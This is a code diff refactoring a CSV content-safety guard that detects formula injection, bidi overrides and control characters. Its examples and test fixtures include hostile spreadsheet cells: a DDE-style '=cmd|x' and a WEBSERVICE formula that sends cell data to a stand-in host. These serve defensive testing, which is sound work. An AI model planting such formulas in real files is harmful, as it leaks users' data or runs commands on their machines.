@@ -220,71 +213,28 @@ var PROFILES = Object.freeze({
220
213
  },
221
214
  });
222
215
 
223
- var DEFAULTS = Object.freeze({
216
+ var DEFAULTS = gateContract.strictDefaults(PROFILES, {
224
217
  delimiter: ",",
225
218
  lineEnding: "\r\n",
226
219
  encoding: "utf-8",
227
220
  locale: "C",
228
- formulaInjectionPolicy: "prefix-tab",
229
221
  formulasAllowlist: Object.freeze(["SUM", "AVERAGE", "COUNT", "MIN", "MAX", "IF", "CONCATENATE"]),
230
222
  dangerousFunctions: DANGEROUS_FUNCTIONS,
231
- bomPrefix: false,
232
223
  maxRows: DEFAULT_MAX_ROWS,
233
224
  maxCellBytes: C.BYTES.kib(64),
234
225
  maxTotalBytes: C.BYTES.gib(1),
235
226
  maxColumns: 0x400,
236
227
  sanitizeAmplificationCap: 1.5,
237
- controlCharPolicy: "reject",
238
- bidiCharPolicy: "reject",
239
- homoglyphPolicy: "audit",
240
- nullByteHandling: "reject",
241
- trailingWhitespacePolicy: "trim",
242
- dialectPolicy: "strict",
243
- nullSemantics: "empty-string",
244
228
  nullMarker: "\\N",
245
229
  preserveLeadingZeros: false,
246
230
  preserveBooleanStrings: false,
247
231
  preserveDateStrings: false,
248
- dateFormat: "iso8601",
249
- numericPrecisionPolicy: "decimal-string-above-safe-int",
250
232
  piiPolicy: "preserve",
251
233
  forensicSnippetBytes: 0,
252
- mode: "enforce",
253
234
  maxRuntimeMs: C.TIME.seconds(30),
254
235
  });
255
236
 
256
- var COMPLIANCE_POSTURES = Object.freeze({
257
- "hipaa": {
258
- formulaInjectionPolicy: "prefix-tab",
259
- bidiCharPolicy: "reject",
260
- controlCharPolicy: "reject",
261
- nullByteHandling: "reject",
262
- piiPolicy: "redact",
263
- forensicSnippetBytes: FORENSIC_SNIPPET_HIPAA,
264
- },
265
- "pci-dss": {
266
- formulaInjectionPolicy: "prefix-tab",
267
- bidiCharPolicy: "reject",
268
- controlCharPolicy: "reject",
269
- nullByteHandling: "reject",
270
- piiPolicy: "redact",
271
- forensicSnippetBytes: FORENSIC_SNIPPET_PCI_DSS,
272
- },
273
- "gdpr": {
274
- formulaInjectionPolicy: "prefix-tab",
275
- bidiCharPolicy: "strip",
276
- controlCharPolicy: "strip",
277
- piiPolicy: "redact",
278
- forensicSnippetBytes: FORENSIC_SNIPPET_GDPR,
279
- },
280
- "soc2": {
281
- formulaInjectionPolicy: "prefix-tab",
282
- bidiCharPolicy: "reject",
283
- controlCharPolicy: "reject",
284
- nullByteHandling: "reject",
285
- forensicSnippetBytes: FORENSIC_SNIPPET_SOC2,
286
- },
287
- });
237
+ var COMPLIANCE_POSTURES = gateContract.compliancePostures(PROFILES, { base: 256, overlays: { hipaa: { piiPolicy: "redact" }, "pci-dss": { piiPolicy: "redact" }, gdpr: { piiPolicy: "redact" } } });
288
238
 
289
239
  // ---- Internal helpers ----
290
240
 
@@ -307,37 +257,17 @@ function _detectIssues(text, opts) {
307
257
  });
308
258
  }
309
259
 
310
- if (opts.bidiCharPolicy !== "allow") {
311
- var bidiMatch = _firstMatch(text, BIDI_RE);
312
- if (bidiMatch) {
313
- issues.push({
314
- kind: "bidi-override", severity: "critical", ruleId: "csv.bidi",
315
- location: bidiMatch.index,
316
- snippet: "Unicode bidi override at byte " + bidiMatch.index +
317
- " (CVE-2021-42574 Trojan Source)",
318
- });
319
- }
320
- }
321
-
322
- if (opts.controlCharPolicy !== "allow") {
323
- var ctrlMatch = _firstMatch(text, C0_CTRL_RE);
324
- if (ctrlMatch) {
325
- issues.push({
326
- kind: "control-char", severity: "high", ruleId: "csv.control",
327
- location: ctrlMatch.index,
328
- snippet: "C0 control char U+" + ctrlMatch.char.charCodeAt(0).toString(HEX_RADIX) +
329
- " at byte " + ctrlMatch.index,
330
- });
331
- }
332
- }
333
-
334
- var nullIdx = text.indexOf(NULL_BYTE);
335
- if (nullIdx >= 0 && opts.nullByteHandling !== "allow") {
336
- issues.push({
337
- kind: "null-byte", severity: "critical", ruleId: "csv.null-byte",
338
- location: nullIdx, snippet: "null byte at " + nullIdx,
339
- });
340
- }
260
+ // Bidi / null / control / zero-width via the shared codepoint class. CSV
261
+ // exposes its own policy vocabulary (bidiCharPolicy / controlCharPolicy /
262
+ // nullByteHandling), normalized here to the shared detector's names so the
263
+ // per-class match-and-push blocks live in exactly one place; zero-width is
264
+ // always scanned (warn) since CSV ships no zeroWidthPolicy.
265
+ issues.push.apply(issues, codepointClass.detectCharThreats(text, {
266
+ bidiPolicy: opts.bidiCharPolicy,
267
+ controlPolicy: opts.controlCharPolicy,
268
+ nullBytePolicy: opts.nullByteHandling,
269
+ zeroWidthPolicy: opts.zeroWidthPolicy || "audit",
270
+ }, "csv", "warn"));
341
271
 
342
272
  if (opts.homoglyphPolicy !== "allow" && /[A-Za-z]/.test(text)) {
343
273
  var homoMatch = _firstMatch(text, HOMOGLYPH_RE);
@@ -351,15 +281,6 @@ function _detectIssues(text, opts) {
351
281
  }
352
282
  }
353
283
 
354
- var zwMatch = _firstMatch(text, ZERO_WIDTH_RE);
355
- if (zwMatch) {
356
- issues.push({
357
- kind: "zero-width", severity: "warn", ruleId: "csv.zero-width",
358
- location: zwMatch.index,
359
- snippet: "zero-width char U+" + zwMatch.char.charCodeAt(0).toString(HEX_RADIX) +
360
- " at byte " + zwMatch.index,
361
- });
362
- }
363
284
 
364
285
  if (opts.formulaInjectionPolicy !== "audit-only" && opts.formulaInjectionPolicy !== "allow") {
365
286
  // Strip ZWSP / RTLO / LRM / RLM / BOM at cell-start before the
@@ -441,15 +362,8 @@ function _stripIssues(text, opts) {
441
362
  return out;
442
363
  }
443
364
 
444
- function _resolveOpts(opts) {
445
- return gateContract.resolveProfileAndPosture(opts, {
446
- profiles: PROFILES,
447
- compliancePostures: COMPLIANCE_POSTURES,
448
- defaults: DEFAULTS,
449
- errorClass: GuardCsvError,
450
- errCodePrefix: "csv",
451
- });
452
- }
365
+ // _resolveOpts removed — the generated guard exposes the bound resolver as
366
+ // module.exports.resolveOpts (defineGuard owns the profile/posture binding).
453
367
 
454
368
  // ---- Cell-level escape with full threat application ----
455
369
 
@@ -505,8 +419,10 @@ function escapeCell(value, opts) {
505
419
  opts = Object.assign({}, DEFAULTS, opts || {});
506
420
  var str = value == null ? "" : String(value);
507
421
 
508
- if (str.length > opts.maxCellBytes) {
509
- throw _err("csv.cell-too-large", "cell exceeds maxCellBytes " + opts.maxCellBytes);
422
+ var cellBytes = Buffer.byteLength(str, "utf8");
423
+ if (cellBytes > opts.maxCellBytes) {
424
+ throw _err("csv.cell-too-large",
425
+ "cell is " + cellBytes + " bytes, exceeds maxCellBytes " + opts.maxCellBytes);
510
426
  }
511
427
 
512
428
  if (opts.nullByteHandling === "reject" && str.indexOf(NULL_BYTE) !== -1) {
@@ -673,7 +589,7 @@ function schema(spec) {
673
589
  }, opts));
674
590
  },
675
591
  validate: function (input, opts) {
676
- return validate(input, Object.assign({ schema: spec }, opts || {}));
592
+ return module.exports.validate(input, Object.assign({ schema: spec }, opts || {}));
677
593
  },
678
594
  columns: cols,
679
595
  };
@@ -728,7 +644,7 @@ function schema(spec) {
728
644
  * out.indexOf("\r\n") !== -1; // → true
729
645
  */
730
646
  function serialize(rows, opts) {
731
- opts = _resolveOpts(opts);
647
+ opts = module.exports.resolveOpts(opts);
732
648
  numericBounds.requireAllPositiveFiniteIntIfPresent(opts,
733
649
  ["maxRows", "maxCellBytes", "maxTotalBytes"],
734
650
  "guardCsv.serialize", GuardCsvError, "csv.bad-opt");
@@ -838,10 +754,9 @@ function serialize(rows, opts) {
838
754
  * rv.ok; // → false
839
755
  * rv.issues.some(function (i) { return i.kind === "dangerous-function"; }); // → true
840
756
  */
841
- function validate(input, opts) {
842
- opts = _resolveOpts(opts);
843
- return gateContract.runIssueValidator(input, opts, _detectIssues);
844
- }
757
+ // validate is generated by defineGuard from `detect` (_detectIssues) under the
758
+ // "text" input contract — runIssueValidator(input, resolved, _detectIssues,
759
+ // "text") identical to the hand-written wrapper this replaced.
845
760
 
846
761
  /**
847
762
  * @primitive b.guardCsv.sanitize
@@ -885,23 +800,11 @@ function validate(input, opts) {
885
800
  * });
886
801
  * clean.indexOf(ZWSP) === -1; // → true
887
802
  */
888
- function sanitize(input, opts) {
889
- opts = _resolveOpts(opts);
890
- var text = typeof input === "string"
891
- ? input
892
- : (Buffer.isBuffer(input) ? input.toString("utf8") : null);
893
- if (text == null) {
894
- throw _err("csv.bad-input", "sanitize requires string or Buffer input");
895
- }
896
- var sanitized = _stripIssues(text, opts);
897
- var amplification = sanitized.length / Math.max(text.length, 1);
898
- if (amplification > opts.sanitizeAmplificationCap) {
899
- throw _err("csv.sanitize-amplified",
900
- "sanitize grew output " + amplification.toFixed(2) +
901
- "x; cap " + opts.sanitizeAmplificationCap);
902
- }
903
- return sanitized;
904
- }
803
+ // sanitize is generated by defineGuard from `sanitizeTransform` (_stripIssues)
804
+ // with sanitizeSeverities:[] (strip unconditionally, never refuse on a detected
805
+ // issue) and sanitizeAmplificationCap:"sanitizeAmplificationCap" (the "sanitize
806
+ // must shrink, never grow" post-condition that throws csv.sanitize-amplified) —
807
+ // identical to the hand-written scrubber this replaced.
905
808
 
906
809
  /**
907
810
  * @primitive b.guardCsv.detect
@@ -975,12 +878,14 @@ function detect(input) {
975
878
  * Build a `b.gateContract` gate suitable for plugging into
976
879
  * `b.staticServe({ contentSafety: { ".csv": gate } })`,
977
880
  * `b.fileUpload({ contentSafety: { "text/csv": gate } })`,
978
- * `b.mail`, or `b.objectStore`. Action chain on validation:
979
- * `serve` (no issues) `audit-only` (warn-only issues) →
980
- * `sanitize` (critical/high but no `reject` policy active
981
- * sanitize, re-parse, re-serialize so formula mitigation lands)
982
- * `refuse` (critical/high under any `reject` policy, or when
983
- * sanitize fails / amplifies past cap).
881
+ * `b.mail`, or `b.objectStore`. Each finding's action is the one the
882
+ * operator's policy for that class selected: `serve` (no issues) →
883
+ * `audit-only` (observe-only findings) `sanitize` (a class set to a
884
+ * mitigation formula `prefix-tab`, bidi/control `strip` — so the gate
885
+ * strips, then re-parses + re-serializes when a formula cell is present so
886
+ * escapeCell's mitigation lands) `refuse` (a class set to `reject`, the
887
+ * dangerous-function denylist, or an ambiguous mixed dialect). `refuse`
888
+ * wins over `sanitize` wins over `audit-only`.
984
889
  *
985
890
  * Operator extensibility: pass `operatorRules: [{ id, severity,
986
891
  * detect: fn(ctx)→boolean, reason }]` to inject custom detectors
@@ -1004,69 +909,94 @@ function detect(input) {
1004
909
  * contentSafety: { ".csv": csvGate },
1005
910
  * });
1006
911
  *
1007
- * // Direct invocation for an upload pipeline:
1008
- * var hostile = Buffer.from("name,formula\r\nalice,=cmd|x\r\n", "utf8");
1009
- * var verdict = await csvGate.check({ bytes: hostile });
1010
- * verdict.action; // "refuse"
912
+ * // A plain formula cell is mitigated in place (strict's formula policy is
913
+ * // prefix-tab a cell beginning `=`/`+`/`-`/`@` is prefixed with a TAB so
914
+ * // spreadsheets render it as text rather than evaluate it):
915
+ * var formula = Buffer.from("name,formula\r\nalice,=cmd|x\r\n", "utf8");
916
+ * (await csvGate.check({ bytes: formula })).action; // → "sanitize"
917
+ *
918
+ * // A denylisted exfiltration/RCE function refuses — too dangerous to serve
919
+ * // even prefixed:
920
+ * var exfil = Buffer.from('a\r\n=WEBSERVICE("http://x/"&A1)\r\n', "utf8");
921
+ * (await csvGate.check({ bytes: exfil })).action; // → "refuse"
1011
922
  */
1012
- function gate(opts) {
1013
- opts = _resolveOpts(opts);
1014
- return gateContract.buildGuardGate(
1015
- opts.name || "guardCsv:" + (opts.profile || "default"),
1016
- opts,
1017
- async function (ctx) {
1018
- var text = gateContract.extractBytesAsText(ctx);
1019
- if (!text) return { ok: true, action: "serve" };
1020
- var rv = validate(text, opts);
1021
-
1022
- var operatorIssues = [];
1023
- if (Array.isArray(opts.operatorRules)) {
1024
- for (var ri = 0; ri < opts.operatorRules.length; ri += 1) {
1025
- var rule = opts.operatorRules[ri];
1026
- try {
1027
- if (rule.detect && rule.detect({ bytes: text, ctx: ctx })) {
1028
- operatorIssues.push({
1029
- kind: rule.id, severity: rule.severity || "warn",
1030
- ruleId: rule.id, snippet: rule.reason || rule.id,
1031
- });
1032
- }
1033
- } catch (_e) { /* operator rule best-effort */ }
1034
- }
1035
- }
1036
- var allIssues = rv.issues.concat(operatorIssues);
923
+ // Disposition of each csv finding = what the operator's policy for that class
924
+ // selected (reject → refuse, a mitigation like prefix-tab/strip → sanitize,
925
+ // audit → audit), resolved through gateContract.policyDisposition. The
926
+ // dangerous-function denylist and an ambiguous mixed-dialect always refuse —
927
+ // neither is safe to serve even after a best-effort mitigation; a stray BOM is
928
+ // always strippable; the zero-width / homoglyph observations are audit-only.
929
+ // Exhaustive over every kind _detectIssues can emit (the gate-disposition
930
+ // coverage test enforces it), so the gate never falls back to severity.
931
+ function _gateDispositionFor(issue, opts) {
932
+ switch (issue.kind) {
933
+ case "bidi-override": return gateContract.policyDisposition(opts.bidiCharPolicy);
934
+ case "control-char": return gateContract.policyDisposition(opts.controlCharPolicy);
935
+ case "null-byte": return gateContract.policyDisposition(opts.nullByteHandling);
936
+ case "formula-prefix-cell": return gateContract.policyDisposition(opts.formulaInjectionPolicy);
937
+ case "homoglyph": return gateContract.policyDisposition(opts.homoglyphPolicy);
938
+ case "bom-mid-stream": return "sanitize";
939
+ case "zero-width": return "sanitize";
940
+ case "dangerous-function": return "refuse";
941
+ case "dialect-mixed-line-endings": return "refuse";
942
+ default: return null;
943
+ }
944
+ }
1037
945
 
1038
- if (allIssues.length === 0) return { ok: true, action: "serve" };
1039
- var hasCritical = allIssues.some(function (i) {
1040
- return i.severity === "critical" || i.severity === "high";
1041
- });
1042
- if (!hasCritical) {
1043
- return { ok: true, action: "audit-only", issues: allIssues };
946
+ // Operator-injected rules run as detect-only findings. The guard owns no
947
+ // sanitizer for them, so buildContentGate treats a refusal-severity hit as
948
+ // refuse (it cannot serve a "sanitized" output that still carries the rule's
949
+ // finding). Best-effort: a throwing detector is skipped — the framework cannot
950
+ // crash a request because an operator rule mishandled bytes.
951
+ function _gateOperatorIssues(text, opts, ctx) {
952
+ var out = [];
953
+ if (!Array.isArray(opts.operatorRules)) return out;
954
+ for (var i = 0; i < opts.operatorRules.length; i += 1) {
955
+ var rule = opts.operatorRules[i];
956
+ try {
957
+ if (rule.detect && rule.detect({ bytes: text, ctx: ctx })) {
958
+ // Default an operator rule that fires to refusal severity: the gate owns
959
+ // no sanitizer for operator findings, so an unspecified-severity rule
960
+ // BLOCKS by default (the operator wrote it to catch something) — they
961
+ // opt DOWN to "warn" to observe-only, never silently up to serve.
962
+ out.push({
963
+ kind: rule.id, severity: rule.severity || "high",
964
+ ruleId: rule.id, snippet: rule.reason || rule.id,
965
+ });
1044
966
  }
967
+ } catch (_e) { /* operator rule best-effort */ }
968
+ }
969
+ return out;
970
+ }
1045
971
 
1046
- if (opts.formulaInjectionPolicy !== "reject" &&
1047
- opts.bidiCharPolicy !== "reject" &&
1048
- opts.controlCharPolicy !== "reject" &&
1049
- opts.nullByteHandling !== "reject") {
1050
- try {
1051
- var clean = sanitize(text, opts);
1052
- var hasFormulaIssue = allIssues.some(function (i) {
1053
- return i.kind === "formula-prefix-cell" ||
1054
- i.kind === "dangerous-function";
1055
- });
1056
- if (hasFormulaIssue) {
1057
- var parsedRows = csv.parse(clean, { header: false });
1058
- clean = serialize(parsedRows, Object.assign({}, opts, { headers: false }));
1059
- }
1060
- return {
1061
- ok: true, action: "sanitize",
1062
- sanitized: Buffer.from(clean, "utf8"),
1063
- issues: allIssues,
1064
- };
1065
- } catch (_e) { /* fall through to refuse */ }
1066
- }
972
+ // Gate sanitize: strip the removable findings, then — when a formula / dangerous
973
+ // cell survives the strip — reparse + reserialize so escapeCell applies the
974
+ // operator's formula mitigation (prefix-tab / wrap-with-quotes). The mitigation
975
+ // is in-place (a TAB-prefixed cell is inert in a spreadsheet but still matches
976
+ // the cell-boundary formula scan), so the gate trusts this output rather than
977
+ // re-validating it. Returns bytes.
978
+ function _gateProduceSanitized(text, opts) {
979
+ var clean = module.exports.sanitize(text, opts);
980
+ var hasFormula = _detectIssues(clean, opts).some(function (i) {
981
+ return i.kind === "formula-prefix-cell" || i.kind === "dangerous-function";
982
+ });
983
+ if (hasFormula) {
984
+ var rows = csv.parse(clean, { header: false });
985
+ clean = serialize(rows, Object.assign({}, opts, { headers: false }));
986
+ }
987
+ return Buffer.from(clean, "utf8");
988
+ }
1067
989
 
1068
- return { ok: false, action: "refuse", issues: allIssues };
1069
- });
990
+ function gate(opts) {
991
+ opts = module.exports.resolveOpts(opts);
992
+ return gateContract.buildContentGate({
993
+ name: opts.name || "guardCsv:" + (opts.profile || "default"),
994
+ opts: opts,
995
+ validate: module.exports.validate,
996
+ dispositionFor: _gateDispositionFor,
997
+ extraIssues: _gateOperatorIssues,
998
+ produceSanitized: _gateProduceSanitized,
999
+ });
1070
1000
  }
1071
1001
 
1072
1002
  // buildProfile / compliancePosture / loadRulePack are assembled by
@@ -1081,10 +1011,11 @@ var INTEGRATION_FIXTURES = Object.freeze({
1081
1011
  contentType: "text/csv",
1082
1012
  extension: ".csv",
1083
1013
  benignBytes: Buffer.from("name,age\r\nalice,30\r\n", "utf8"),
1084
- // Hostile: cell starts with formula trigger `=cmd|x` strict
1085
- // profile prepends TAB so spreadsheets disarm at evaluation time;
1086
- // gate's check returns refuse for any critical/high issue.
1087
- hostileBytes: Buffer.from("name,formula\r\nalice,=cmd|x\r\n", "utf8"),
1014
+ // Hostile: a cell invokes a denylisted exfiltration function (WEBSERVICE)
1015
+ // an RCE / data-exfil vector too dangerous to serve even mitigated, so the
1016
+ // gate refuses (a plain formula prefix-cell would instead be sanitized in
1017
+ // place by the strict profile's prefix-tab policy).
1018
+ hostileBytes: Buffer.from('name,formula\r\nalice,=WEBSERVICE("http://x/"&A1)\r\n', "utf8"),
1088
1019
  });
1089
1020
 
1090
1021
  // Assembled from the gate-contract guard factory: error class, registry
@@ -1104,10 +1035,18 @@ module.exports = gateContract.defineGuard({
1104
1035
  mimeTypes: ["text/csv"],
1105
1036
  extensions: [".csv"],
1106
1037
  integrationFixtures: INTEGRATION_FIXTURES,
1107
- validate: validate,
1108
- sanitize: sanitize,
1038
+ // validate + sanitize generated from detect/sanitizeTransform. "text" input
1039
+ // contract (string/Buffer→utf8, bad-input otherwise — _detectIssues returns
1040
+ // [] on a non-string, so the contract owns the refusal). sanitizeSeverities
1041
+ // [] strips unconditionally; sanitizeAmplificationCap enforces shrink.
1042
+ inputContract: "text",
1043
+ detect: _detectIssues,
1044
+ sanitizeTransform: _stripIssues,
1045
+ sanitizeSeverities: [],
1046
+ sanitizeAmplificationCap: "sanitizeAmplificationCap",
1109
1047
  gate: gate,
1110
1048
  extra: {
1049
+ _gateDispositionForTest: _gateDispositionFor,
1111
1050
  serialize: serialize,
1112
1051
  escapeCell: escapeCell,
1113
1052
  detect: detect,